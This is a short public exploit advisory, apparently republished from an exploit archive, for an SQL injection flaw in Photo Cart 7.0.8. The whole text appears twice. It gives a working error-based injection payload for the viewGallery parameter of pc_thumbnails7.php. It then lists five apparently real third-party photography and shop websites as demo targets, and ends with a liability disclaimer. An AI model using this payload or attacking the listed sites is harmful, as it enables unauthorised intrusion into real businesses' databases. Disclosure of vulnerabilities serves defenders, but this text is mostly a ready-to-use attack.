##########################################
# Exploit Title: Photo Cart SQL Injection Vulnerability
# Date: 2013-03-09
# Author: DaOne aka Mocking Bird
# Software Link: http://www.picturespro.com/photo-cart/
# Category: webapps/php
# Version: 7.0.8
# Price: $329
##########################################
[#] Exploit
Error Based Injection:
http://{host}/pc_thumbnails7.php?page=1&viewGallery='%2B(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'
-Demo-
http://hama.com.au/clients/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.stkphoto.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.nateweatherly.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.custardphotography.co.uk/photostore/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.surfthespot.com/shop/pc_thumbnails7.php?page=1&viewGallery={SQL}
Greets to: All TGT Members..
# Exploit Title: Photo Cart SQL Injection Vulnerability
# Date: 2013-03-09
# Author: DaOne aka Mocking Bird
# Software Link: http://www.picturespro.com/photo-cart/
# Category: webapps/php
# Version: 7.0.8
# Price: $329
##########################################
[#] Exploit
Error Based Injection:
http://{host}/pc_thumbnails7.php?page=1&viewGallery='%2B(select 1 FROM(select count(*),concat((select (select concat(version())) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)%2B'
-Demo-
http://hama.com.au/clients/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.stkphoto.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.nateweatherly.com/photocart/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.custardphotography.co.uk/photostore/pc_thumbnails7.php?page=1&viewGallery={SQL}
http://www.surfthespot.com/shop/pc_thumbnails7.php?page=1&viewGallery={SQL}
Greets to: All TGT Members..
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information